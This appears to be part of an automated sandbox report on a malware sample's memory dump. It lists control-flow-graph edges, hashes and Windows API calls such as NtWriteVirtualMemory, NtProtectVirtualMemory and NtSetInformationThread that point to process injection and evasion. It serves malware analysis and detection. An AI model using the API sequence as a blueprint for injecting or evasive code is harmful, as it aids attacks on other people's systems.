229a815-229a841 1244->1290 1245->1232 1249 22a326f-22a32f4 1245->1249 1246->1232 1254 22a3108-22a3161 1246->1254 1249->1232 1259 22a32fa-22a332c 1249->1259 1257 22a1853-22a1863 1252->1257 1258 22a1e40-22a1e54 1252->1258 1254->1232 1261 22a3163-22a317d 1254->1261 1257->1252 1264 22a1865-22a1892 1257->1264 1263 22a1e58-22a1e6d 1258->1263 1259->1232 1260 22a3332-22a3335 1259->1260 1261->1232 1265 22a317f-22a31ab call 22a322b NtSetInformationThread 1261->1265 1267 22a2172-22a2187 1263->1267 1268 22a1e73-22a1eac 1263->1268 1264->1252 1269 22a1894-22a18aa 1264->1269 1282 22a31b0-22a31b8 1265->1282 1267->1183 1274 22a218d-22a218e 1267->1274 1268->1263 1272 22a1eae-22a1ec5 1268->1272 1269->1252 1273 22a18ac-22a1920 1269->1273 1272->1263 1277 22a1ec7-22a1f29 1272->1277 1285 22a1922-22a199c 1273->1285 1279 22a2192-22a21a1 1274->1279 1277->1263 1292 22a1f2f-22a1f46 1277->1292 1280 22a23b6-22a23dd call 22a23e2 1279->1280 1281 22a21a7-22a2219 1279->1281 1281->1183 1295 22a221f-22a222a 1281->1295 1282->1282 1288 22a31ba-22a31c6 1282->1288 1293 22a1a39-22a1a4c 1285->1293 1294 22a19a2-22a19e7 1285->1294 1288->1232 1305 229f4b3-229f4e1 call 229fcc1 call 229f542 1289->1305 1306 229f4e4-229f53d LoadLibraryA call 229f542 1289->1306 1297 2291320-229136d call 22910c0 1290->1297 1298 229a847-229a8fa 1290->1298 1292->1183 1300 22a1f4c-22a1fb8 1292->1300 1302 22a1a69-22a1a79 1293->1302 1303 22a1a4e-22a1a68 1293->1303 1294->1302 1295->1279 1304 22a2230-22a2244 1295->1304 1314 22a374d-22a3755 1298->1314 1315 229a900-229aac7 call 229f3ca call 22a2acd 1298->1315 1309 22a1fbd-22a1fd1 1300->1309 1311 22a1a7f-22a1a96 1302->1311 1312 22a1c2d-22a1c44 1302->1312 1303->1302 1304->1279 1310 22a224a-22a227e 1304->1310 1305->1306 1320 22a20a7-22a20e0 1309->1320 1321 22a1fd7-22a1ff1 1309->1321 1310->1279 1322 22a2284-22a22f0 1310->1322 1311->1312 1323 22a1a9c-22a1b0e 1311->1323 1327 22a1c4a-22a1cd0 1312->1327 1328 22a1d64-22a1da8 1312->1328 1325 22a3756-22a378f 1314->1325 1364 229aacd-229afd9 call 229f3ee call 22a2acd call 229bd4b call 229f313 call 22a2acd 1315->1364 1365 229bbfe-229bd48 call 22a2acd * 3 1315->1365 1320->1309 1336 22a20e6-22a216c call 22a23e2 1320->1336 1331 22a201c-22a2084 1321->1331 1332 22a1ff3-22a200a 1321->1332 1345 22a22f5-22a230e 1322->1345 1346 22a1b0f-22a1b3f 1323->1346 1325->1325 1338 22a3791-22a37e0 1325->1338 1327->1328 1341 22a1cd6-22a1d61 1327->1341 1328->1285 1333 22a1dae-22a1dec call 22a23e2 1328->1333 1331->1320 1332->1297 1342 22a2010-22a201a 1332->1342 1333->1231 1341->1328 1342->1331 1352 22a2088-22a20a6 1342->1352 1353 22a237b-22a23ae 1345->1353 1354 22a2310-22a237a 1345->1354 1346->1346 1355 22a1b41-22a1bdb 1346->1355 1352->1320 1353->1345 1360 22a23b4 1353->1360 1354->1353 1355->1346 1366 22a1be1-22a1c20 1355->1366 1360->1280 1364->1365 1394 229afdf-229b089 1364->1394 1365->1289 1366->1346 1369 22a1c26-22a1c2a 1366->1369 1369->1312 1394->1289 1396 229b08f-229b1e5 call 22a2acd 1394->1396 1396->1297 1401 229b1eb-229b20b 1396->1401 1401->1365 1402 229b211-229b3f2 call 229b2fb 1401->1402 1402->1183 1408 229b3f8-229b554 call 22a2acd 1402->1408 1408->1365 1413 229b55a-229b597 1408->1413 1413->1365 1414 229b59d-229b604 1413->1414 1416 229b641-229b64a 1414->1416 1417 229b606-229b63b 1414->1417 1416->1244 1418 229b650-229b66e 1416->1418 1417->1365 1417->1416 1418->1365 1419 229b674-229b68f 1418->1419 1419->1244 1420 229b695-229b8b7 call 229f944 1419->1420 1420->1365 1426 229b8bd-229b9ea call 22a374d NtWriteVirtualMemory 1420->1426 1426->1365 1431 229b9f0-229baba call 22a2acd 1426->1431 1431->1365 1435 229bac0-229bb82 call 22a2acd 1431->1435 1435->1365 1439 229bb84-229bbde 1435->1439 1439->1314 1441 229bbe4-229bbfd call 22a2acd 1439->1441
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001A.00000002.51208710920.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_26_2_2290000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: );J$EK]
                                                                                                                          • API String ID: 0-1158390361
                                                                                                                          • Opcode ID: a4b92d3d0d7d265f08df846bb82963276782873b54e4a78cca23913e034de93d
                                                                                                                          • Instruction ID: 8aef15a0f8dccc1228480d4f0edce6af3f790094f83c71f7a487d3ca2a9f4d95
                                                                                                                          • Opcode Fuzzy Hash: a4b92d3d0d7d265f08df846bb82963276782873b54e4a78cca23913e034de93d
                                                                                                                          • Instruction Fuzzy Hash: CFB15930A14349CFDF38DEB4C9B43EA37A2EF55350F59416ACC8A8BA59D7319982CB01
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1444 229c88b-229c8a0 1445 229cbe8-229cd65 call 229f32f call 229cc7e 1444->1445 1446 229c8a6-229c954 1444->1446 1450 229f3ee-229f4b1 1445->1450 1449 229c95a-229ca12 call 229f3ee 1446->1449 1446->1450 1465 229ca18-229cae3 call 229ca93 1449->1465 1466 229a574-229a80f call 22a1490 call 229a760 1449->1466 1457 229f4b3-229f4e1 call 229fcc1 call 229f542 1450->1457 1458 229f4e4-229f4e9 LoadLibraryA 1450->1458 1457->1458 1462 229f533-229f53d call 229f542 1458->1462 1465->1466 1480 229cae9-229cb18 1465->1480 1466->1450 1486 229a815-229a841 1466->1486 1480->1466 1482 229cb1e-229cbe6 NtAllocateVirtualMemory 1480->1482 1482->1445 1487 2291320-229136d call 22910c0 1486->1487 1488 229a847-229a8fa 1486->1488 1491 22a374d-22a3755 1488->1491 1492 229a900-229aac7 call 229f3ca call 22a2acd 1488->1492 1495 22a3756-22a378f 1491->1495 1504 229aacd-229afd9 call 229f3ee call 22a2acd call 229bd4b call 229f313 call 22a2acd 1492->1504 1505 229bbfe-229bd48 call 22a2acd * 3 1492->1505 1495->1495 1497 22a3791-22a37e0 1495->1497 1504->1505 1532 229afdf-229b089 1504->1532 1505->1450 1532->1450 1534 229b08f-229b1e5 call 22a2acd 1532->1534 1534->1487 1539 229b1eb-229b20b 1534->1539 1539->1505 1540 229b211-229b3f2 call 229b2fb 1539->1540 1546 229b3f8-229b554 call 22a2acd 1540->1546 1547 229138e-2291464 call 22a37e8 1540->1547 1546->1505 1556 229b55a-229b597 1546->1556 1557 22914dd-2291502 1547->1557 1558 2291466-22a2adc 1547->1558 1556->1505 1559 229b59d-229b604 1556->1559 1560 2291572-2291578 1557->1560 1561 2291517-2291518 1557->1561 1563 22a2add-22a2b37 1558->1563 1568 229b641-229b64a 1559->1568 1569 229b606-229b63b 1559->1569 1564 2291579-2291594 1560->1564 1561->1560 1563->1547 1570 22a2b3d-22a2d65 1563->1570 1564->1561 1567 2291596-22915a6 1564->1567 1571 22915a9-22915b4 1567->1571 1572 22915b6-22915b9 1567->1572 1568->1466 1573 229b650-229b66e 1568->1573 1569->1505 1569->1568 1570->1563 1595 22a2d6b-22a2de9 call 22a06a2 1570->1595 1571->1572 1572->1564 1575 22915bb-22a15f9 call 229f3ee * 2 call 22a37e8 GetPEB call 22a23e2 1572->1575 1573->1505 1576 229b674-229b68f 1573->1576 1613 22a15ff-22a16a1 1575->1613 1614 22a1df1-22a1e3a 1575->1614 1576->1466 1577 229b695-229b8b7 call 229f944 1576->1577 1577->1505 1594 229b8bd-229b99b call 22a374d NtWriteVirtualMemory 1577->1594 1607 229b9e1-229b9ea 1594->1607 1608 22a2dec-22a2dff 1595->1608 1607->1505 1610 229b9f0-229baba call 22a2acd 1607->1610 1608->1608 1611 22a2e01-22a2e89 1608->1611 1610->1505 1625 229bac0-229bb82 call 22a2acd 1610->1625 1616 22a2e8c-22a2f06 1611->1616 1613->1547 1621 22a16a7-22a1838 1613->1621 1623 22a2f08-22a2fe7 call 22a322b 1616->1623 1634 22a183c-22a184d 1621->1634 1643 22a31cc-22a3231 1623->1643 1644 22a2fed-22a3091 1623->1644 1625->1505 1635 229bb84-229bbde 1625->1635 1636 22a1853-22a1863 1634->1636 1637 22a1e40-22a1e54 1634->1637 1635->1491 1642 229bbe4-229bbfd call 22a2acd 1635->1642 1636->1634 1641 22a1865-22a1892 1636->1641 1640 22a1e58-22a1e6d 1637->1640 1645 22a2172-22a2187 1640->1645 1646 22a1e73-22a1eac 1640->1646 1641->1634 1647 22a1894-22a18aa 1641->1647 1643->1466 1667 22a3237-22a3269 1643->1667 1644->1643 1655 22a3097-22a30ad 1644->1655 1645->1547 1653 22a218d-22a218e 1645->1653 1646->1640 1651 22a1eae-22a1ec5 1646->1651 1647->1634 1652 22a18ac-22a1920 1647->1652 1651->1640 1656 22a1ec7-22a1f29 1651->1656 1664 22a1922-22a199c 1652->1664 1658 22a2192-22a21a1 1653->1658 1655->1643 1662 22a30b3-22a30ca 1655->1662 1656->1640 1670 22a1f2f-22a1f46 1656->1670 1659 22a23b6-22a23dd call 22a23e2 1658->1659 1660 22a21a7-22a2219 1658->1660 1660->1547 1673 22a221f-22a222a 1660->1673 1662->1643 1669 22a30d0-22a3102 1662->1669 1671 22a1a39-22a1a4c 1664->1671 1672 22a19a2-22a19e7 1664->1672 1667->1643 1674 22a326f-22a32f4 1667->1674 1669->1643 1683 22a3108-22a3161 1669->1683 1670->1547 1677 22a1f4c-22a1fb8 1670->1677 1679 22a1a69-22a1a79 1671->1679 1680 22a1a4e-22a1a68 1671->1680 1672->1679 1673->1658 1681 22a2230-22a2244 1673->1681 1674->1643 1689 22a32fa-22a332c 1674->1689 1685 22a1fbd-22a1fd1 1677->1685 1687 22a1a7f-22a1a96 1679->1687 1688 22a1c2d-22a1c44 1679->1688 1680->1679 1681->1658 1686 22a224a-22a227e 1681->1686 1683->1643 1691 22a3163-22a317d 1683->1691 1692 22a20a7-22a20e0 1685->1692 1693 22a1fd7-22a1ff1 1685->1693 1686->1658 1694 22a2284-22a22f0 1686->1694 1687->1688 1695 22a1a9c-22a1b0e 1687->1695 1696 22a1c4a-22a1cd0 1688->1696 1697 22a1d64-22a1da8 1688->1697 1689->1643 1690 22a3332-22a3335 1689->1690 1691->1643 1699 22a317f-22a31ab call 22a322b NtSetInformationThread 1691->1699 1692->1685 1705 22a20e6-22a216c call 22a23e2 1692->1705 1700 22a201c-22a2084 1693->1700 1701 22a1ff3-22a200a 1693->1701 1711 22a22f5-22a230e 1694->1711 1712 22a1b0f-22a1b3f 1695->1712 1696->1697 1706 22a1cd6-22a1d61 1696->1706 1697->1664 1702 22a1dae-22a1dec call 22a23e2 1697->1702 1721 22a31b0-22a31b8 1699->1721 1700->1692 1701->1487 1708 22a2010-22a201a 1701->1708 1702->1614 1706->1697 1708->1700 1716 22a2088-22a20a6 1708->1716 1717 22a237b-22a23ae 1711->1717 1718 22a2310-22a237a 1711->1718 1712->1712 1719 22a1b41-22a1bdb 1712->1719 1716->1692 1717->1711 1724 22a23b4 1717->1724 1718->1717 1719->1712 1728 22a1be1-22a1c20 1719->1728 1721->1721 1726 22a31ba-22a31c6 1721->1726 1724->1659 1726->1643 1728->1712 1729 22a1c26-22a1c2a 1728->1729 1729->1688
                                                                                                                          APIs
                                                                                                                          • NtAllocateVirtualMemory.NTDLL(8D05082D,?,-00000001EF38FF1E), ref: 0229CBC8
                                                                                                                          • LoadLibraryA.KERNELBASE(?,?,?,4A82DAC6,022904DF,16EF18E8,0229E3FE,00000000,0229042E), ref: 0229F4E6
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001A.00000002.51208710920.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_26_2_2290000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateLibraryLoadMemoryVirtual
                                                                                                                          • String ID: U=b
                                                                                                                          • API String ID: 2616484454-117013522
                                                                                                                          • Opcode ID: c3e6492804730bdffc58052f636a2bff474bc7b25ae8e1f45e2bd308a4fdb406
                                                                                                                          • Instruction ID: 227d880e3932897dbe3dc2e449eaca24259683177a30928425fb41250dadf468
                                                                                                                          • Opcode Fuzzy Hash: c3e6492804730bdffc58052f636a2bff474bc7b25ae8e1f45e2bd308a4fdb406
                                                                                                                          • Instruction Fuzzy Hash: BC816D71A1035BDFCF349EA89DA43EA36B3EF99390F94013ADC499B258D7358A41CB11
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1730 22a1161-22a117b 1731 22a1181-22a11be 1730->1731 1731->1731 1732 22a11c0-22a1213 1731->1732 1734 22a1219-22a1275 1732->1734 1735 229138e-2291464 call 22a37e8 1732->1735 1734->1735 1739 22a127b-22a12ad 1734->1739 1746 22914dd-2291502 1735->1746 1747 2291466-22a2adc 1735->1747 1741 229f3ee-229f4b1 1739->1741 1742 22a12b3-22a1330 1739->1742 1748 229f4b3-229f4e1 call 229fcc1 call 229f542 1741->1748 1749 229f4e4-229f53d LoadLibraryA call 229f542 1741->1749 1750 2291572-2291578 1746->1750 1751 2291517-2291518 1746->1751 1754 22a2add-22a2b37 1747->1754 1748->1749 1755 2291579-2291594 1750->1755 1751->1750 1754->1735 1763 22a2b3d-22a2d65 1754->1763 1755->1751 1760 2291596-22915a6 1755->1760 1764 22915a9-22915b4 1760->1764 1765 22915b6-22915b9 1760->1765 1763->1754 1781 22a2d6b-22a2de9 call 22a06a2 1763->1781 1764->1765 1765->1755 1768 22915bb-22a15f9 call 229f3ee * 2 call 22a37e8 GetPEB call 22a23e2 1765->1768 1794 22a15ff-22a16a1 1768->1794 1795 22a1df1-22a1e3a 1768->1795 1790 22a2dec-22a2dff 1781->1790 1790->1790 1792 22a2e01-22a2e89 1790->1792 1796 22a2e8c-22a2f06 1792->1796 1794->1735 1800 22a16a7-22a1838 1794->1800 1801 22a2f08-22a2fe7 call 22a322b 1796->1801 1808 22a183c-22a184d 1800->1808 1814 22a31cc-22a3231 1801->1814 1815 22a2fed-22a3091 1801->1815 1809 22a1853-22a1863 1808->1809 1810 22a1e40-22a1e54 1808->1810 1809->1808 1813 22a1865-22a1892 1809->1813 1812 22a1e58-22a1e6d 1810->1812 1816 22a2172-22a2187 1812->1816 1817 22a1e73-22a1eac 1812->1817 1813->1808 1818 22a1894-22a18aa 1813->1818 1836 229a574-229a80f call 22a1490 call 229a760 1814->1836 1837 22a3237-22a3269 1814->1837 1815->1814 1824 22a3097-22a30ad 1815->1824 1816->1735 1823 22a218d-22a218e 1816->1823 1817->1812 1821 22a1eae-22a1ec5 1817->1821 1818->1808 1822 22a18ac-22a1920 1818->1822 1821->1812 1825 22a1ec7-22a1f29 1821->1825 1833 22a1922-22a199c 1822->1833 1827 22a2192-22a21a1 1823->1827 1824->1814 1831 22a30b3-22a30ca 1824->1831 1825->1812 1840 22a1f2f-22a1f46 1825->1840 1828 22a23b6-22a23dd call 22a23e2 1827->1828 1829 22a21a7-22a2219 1827->1829 1829->1735 1843 22a221f-22a222a 1829->1843 1831->1814 1839 22a30d0-22a3102 1831->1839 1841 22a1a39-22a1a4c 1833->1841 1842 22a19a2-22a19e7 1833->1842 1836->1741 1909 229a815-229a841 1836->1909 1837->1814 1845 22a326f-22a32f4 1837->1845 1839->1814 1855 22a3108-22a3161 1839->1855 1840->1735 1848 22a1f4c-22a1fb8 1840->1848 1850 22a1a69-22a1a79 1841->1850 1851 22a1a4e-22a1a68 1841->1851 1842->1850 1843->1827 1852 22a2230-22a2244 1843->1852 1845->1814 1862 22a32fa-22a332c 1845->1862 1857 22a1fbd-22a1fd1 1848->1857 1860 22a1a7f-22a1a96 1850->1860 1861 22a1c2d-22a1c44 1850->1861 1851->1850 1852->1827 1858 22a224a-22a227e 1852->1858 1855->1814 1864 22a3163-22a317d 1855->1864 1865 22a20a7-22a20e0 1857->1865 1866 22a1fd7-22a1ff1 1857->1866 1858->1827 1867 22a2284-22a22f0 1858->1867 1860->1861 1869 22a1a9c-22a1b0e 1860->1869 1870 22a1c4a-22a1cd0 1861->1870 1871 22a1d64-22a1da8 1861->1871 1862->1814 1863 22a3332-22a3335 1862->1863 1864->1814 1873 22a317f-22a31ab call 22a322b NtSetInformationThread 1864->1873 1865->1857 1880 22a20e6-22a216c call 22a23e2 1865->1880 1874 22a201c-22a2084 1866->1874 1875 22a1ff3-22a200a 1866->1875 1887 22a22f5-22a230e 1867->1887 1889 22a1b0f-22a1b3f 1869->1889 1870->1871 1881 22a1cd6-22a1d61 1870->1881 1871->1833 1876 22a1dae-22a1dec call 22a23e2 1871->1876 1900 22a31b0-22a31b8 1873->1900 1874->1865 1883 2291320-229136d call 22910c0 1875->1883 1884 22a2010-22a201a 1875->1884 1876->1795 1881->1871 1884->1874 1893 22a2088-22a20a6 1884->1893 1894 22a237b-22a23ae 1887->1894 1895 22a2310-22a237a 1887->1895 1889->1889 1897 22a1b41-22a1bdb 1889->1897 1893->1865 1894->1887 1904 22a23b4 1894->1904 1895->1894 1897->1889 1912 22a1be1-22a1c20 1897->1912 1900->1900 1908 22a31ba-22a31c6 1900->1908 1904->1828 1908->1814 1909->1883 1911 229a847-229a8fa 1909->1911 1915 22a374d-22a3755 1911->1915 1916 229a900-229aac7 call 229f3ca call 22a2acd 1911->1916 1912->1889 1914 22a1c26-22a1c2a 1912->1914 1914->1861 1917 22a3756-22a378f 1915->1917 1926 229aacd-229afd9 call 229f3ee call 22a2acd call 229bd4b call 229f313 call 22a2acd 1916->1926 1927 229bbfe-229bd48 call 22a2acd * 3 1916->1927 1917->1917 1919 22a3791-22a37e0 1917->1919 1926->1927 1954 229afdf-229b089 1926->1954 1927->1741 1954->1741 1956 229b08f-229b1e5 call 22a2acd 1954->1956 1956->1883 1961 229b1eb-229b20b 1956->1961 1961->1927 1962 229b211-229b3f2 call 229b2fb 1961->1962 1962->1735 1968 229b3f8-229b554 call 22a2acd 1962->1968 1968->1927 1973 229b55a-229b597 1968->1973 1973->1927 1974 229b59d-229b604 1973->1974 1976 229b641-229b64a 1974->1976 1977 229b606-229b63b 1974->1977 1976->1836 1978 229b650-229b66e 1976->1978 1977->1927 1977->1976 1978->1927 1979 229b674-229b68f 1978->1979 1979->1836 1980 229b695-229b8b7 call 229f944 1979->1980 1980->1927 1986 229b8bd-229b9ea call 22a374d NtWriteVirtualMemory 1980->1986 1986->1927 1991 229b9f0-229baba call 22a2acd 1986->1991 1991->1927 1995 229bac0-229bb82 call 22a2acd 1991->1995 1995->1927 1999 229bb84-229bbde 1995->1999 1999->1915 2001 229bbe4-229bbfd call 22a2acd 1999->2001
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001A.00000002.51208710920.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_26_2_2290000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: EK]
                                                                                                                          • API String ID: 0-1532622298
                                                                                                                          • Opcode ID: a0cba0a81fb308cf4c3a5c258c041078d070c32af104d5bf65bead1deba37b65
                                                                                                                          • Instruction ID: eb2cbd250763272bcd8cf8e7208af8028c3c0dfd6f943d0961196a5626680773
                                                                                                                          • Opcode Fuzzy Hash: a0cba0a81fb308cf4c3a5c258c041078d070c32af104d5bf65bead1deba37b65
                                                                                                                          • Instruction Fuzzy Hash: 8861BB7161034A9FDF359EB48AA43DB37A6EF9A3A0F55441ECC4ACFA01D7718986CB01
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 2004 229ffed-229fff4 call 22a0391 2007 229fffa-22a008e 2004->2007 2009 22a0090-22a013c call 22a02dc 2007->2009 2013 22a013e-22a014a 2009->2013 2014 22a014c-22a01d8 2009->2014 2013->2014 2014->2009 2016 22a01de-22a01ea 2014->2016 2016->2007 2017 22a01f0-22a0231 2016->2017 2018 229f3ee-229f4b1 2017->2018 2019 22a0237-22a0243 2017->2019 2022 229f4b3-229f4e1 call 229fcc1 call 229f542 2018->2022 2023 229f4e4-229f53d LoadLibraryA call 229f542 2018->2023 2019->2007 2021 22a0249-22a0280 2019->2021 2021->2007 2024 22a0286-22a02d8 2021->2024 2022->2023
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001A.00000002.51208710920.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_26_2_2290000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: `
                                                                                                                          • API String ID: 0-1850852036
                                                                                                                          • Opcode ID: 021217d6e82f315ae35b3563ff0eb4a17839efee1226da9567c98cd0f92d8134
                                                                                                                          • Instruction ID: ab16a663e764d3b5b77d7488a763370fffa0ceef89f64fd4858d85e8ca8b30dd
                                                                                                                          • Opcode Fuzzy Hash: 021217d6e82f315ae35b3563ff0eb4a17839efee1226da9567c98cd0f92d8134
                                                                                                                          • Instruction Fuzzy Hash: 0C519F7661075ACFCF745EA94E683DA33A3EFA13A0FDA402ACC4E9B504C7754A45CB41
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 2153 22a23e2-22a24f9 NtProtectVirtualMemory
                                                                                                                          APIs
                                                                                                                          • NtProtectVirtualMemory.NTDLL(-11417B1E,?,?,?,?,022A15C1,12BC0BD0,0229A728), ref: 022A24F5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001A.00000002.51208710920.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_26_2_2290000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: MemoryProtectVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2706961497-0
                                                                                                                          • Opcode ID: 1670dfe0295b295c956e32a55cfa435958ec75999ae85247dfb3362f5119314a
                                                                                                                          • Instruction ID: bb1b8697066ceadb776b78f72aee6ae3e4ba5e73982924afa458c612b805582e
                                                                                                                          • Opcode Fuzzy Hash: 1670dfe0295b295c956e32a55cfa435958ec75999ae85247dfb3362f5119314a
                                                                                                                          • Instruction Fuzzy Hash: 47017CB46143998FDF30CE68C8D87DA7695FB8D700F81412AAD4DAB305C6715E8ACB61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 2033 229bf1c-229bfcc call 229bf5c 2038 229f3ee-229f4b1 2033->2038 2039 229bfd2-229c025 call 229c88b call 229ebec 2033->2039 2043 229f4b3-229f4e1 call 229fcc1 call 229f542 2038->2043 2044 229f4e4-229f53d LoadLibraryA call 229f542 2038->2044 2054 229e546-229e553 call 229c02c 2039->2054 2043->2044 2059 229e51e-229e520 2054->2059 2060 229e555 2054->2060 2062 229e4bf-229e4c0 2059->2062 2063 229e522 2059->2063 2060->2038 2061 229e518 2060->2061 2061->2054 2064 229e4a2 2062->2064 2065 229e4c2-229e4c4 2062->2065 2063->2054 2068 229e4a9-229e4ae 2064->2068 2066 229e463 2065->2066 2067 229e4c6 2065->2067 2066->2068 2069 229e4f0-229e509 call 229c7b8 2067->2069 2068->2069 2069->2061
                                                                                                                          APIs
                                                                                                                          • LoadLibraryA.KERNELBASE(?,?,?,4A82DAC6,022904DF,16EF18E8,0229E3FE,00000000,0229042E), ref: 0229F4E6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001A.00000002.51208710920.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_26_2_2290000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1029625771-0
                                                                                                                          • Opcode ID: 4dde117c9ab0f498474159960d817822d2740f54e3fa7f55f575a93b40af4ef9
                                                                                                                          • Instruction ID: 37d5f78019999084bcb4418b3882eed55cbc9909077be02d458d021af0fcdcc1
                                                                                                                          • Opcode Fuzzy Hash: 4dde117c9ab0f498474159960d817822d2740f54e3fa7f55f575a93b40af4ef9
                                                                                                                          • Instruction Fuzzy Hash: DA419A312243469FCF309EA849E03DB2262AF963B0F91431BCC69DB299D7718805C641
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 2072 229be04-229bea8 call 229c88b 2077 229f3ee-229f4b1 2072->2077 2078 229beae-229c025 call 229bede call 229ebec 2072->2078 2082 229f4b3-229f4e1 call 229fcc1 call 229f542 2077->2082 2083 229f4e4-229f53d LoadLibraryA call 229f542 2077->2083 2095 229e546-229e553 call 229c02c 2078->2095 2082->2083 2099 229e51e-229e520 2095->2099 2100 229e555 2095->2100 2102 229e4bf-229e4c0 2099->2102 2103 229e522 2099->2103 2100->2077 2101 229e518 2100->2101 2101->2095 2104 229e4a2 2102->2104 2105 229e4c2-229e4c4 2102->2105 2103->2095 2108 229e4a9-229e4ae 2104->2108 2106 229e463 2105->2106 2107 229e4c6 2105->2107 2106->2108 2109 229e4f0-229e509 call 229c7b8 2107->2109 2108->2109 2109->2101
                                                                                                                          APIs
                                                                                                                          • LoadLibraryA.KERNELBASE(?,?,?,4A82DAC6,022904DF,16EF18E8,0229E3FE,00000000,0229042E), ref: 0229F4E6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001A.00000002.51208710920.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_26_2_2290000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1029625771-0
                                                                                                                          • Opcode ID: 72ba87792771cc4dd5f6310a94303021875a3260cf59806d4016084067a7ab69
                                                                                                                          • Instruction ID: 292291f4bb927259cb8b5658176dd009d981b48308af0990d109cd4c712adefc
                                                                                                                          • Opcode Fuzzy Hash: 72ba87792771cc4dd5f6310a94303021875a3260cf59806d4016084067a7ab69
                                                                                                                          • Instruction Fuzzy Hash: 3A31BD75620359DBCF309FB459A43EA336AAF857A0F92011FDC46DB644D7718D80CB42
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 2112 229c02c-229c114 call 229c0b3 call 229c88b call 229ebec 2121 229c11a-229c11b 2112->2121 2122 229f3ee-229f4b1 2112->2122 2121->2122 2124 229f4b3-229f4e1 call 229fcc1 call 229f542 2122->2124 2125 229f4e4-229f53d LoadLibraryA call 229f542 2122->2125 2124->2125
                                                                                                                          APIs
                                                                                                                          • LoadLibraryA.KERNELBASE(?,?,?,4A82DAC6,022904DF,16EF18E8,0229E3FE,00000000,0229042E), ref: 0229F4E6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001A.00000002.51208710920.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_26_2_2290000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1029625771-0
                                                                                                                          • Opcode ID: 32ec042b3a3ff8751d5e3830c917f679b5f0892ab36ffb89ee1e3e064fc07b13
                                                                                                                          • Instruction ID: 9bd5ac7265987f9528bbeea21211f54dbab524748460cf85ec56f83096b7df04
                                                                                                                          • Opcode Fuzzy Hash: 32ec042b3a3ff8751d5e3830c917f679b5f0892ab36ffb89ee1e3e064fc07b13
                                                                                                                          • Instruction Fuzzy Hash: A8318A726103199BCF30AE694E943DE27B7AFD9790FAA801BDC09DB204D77189468A51
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

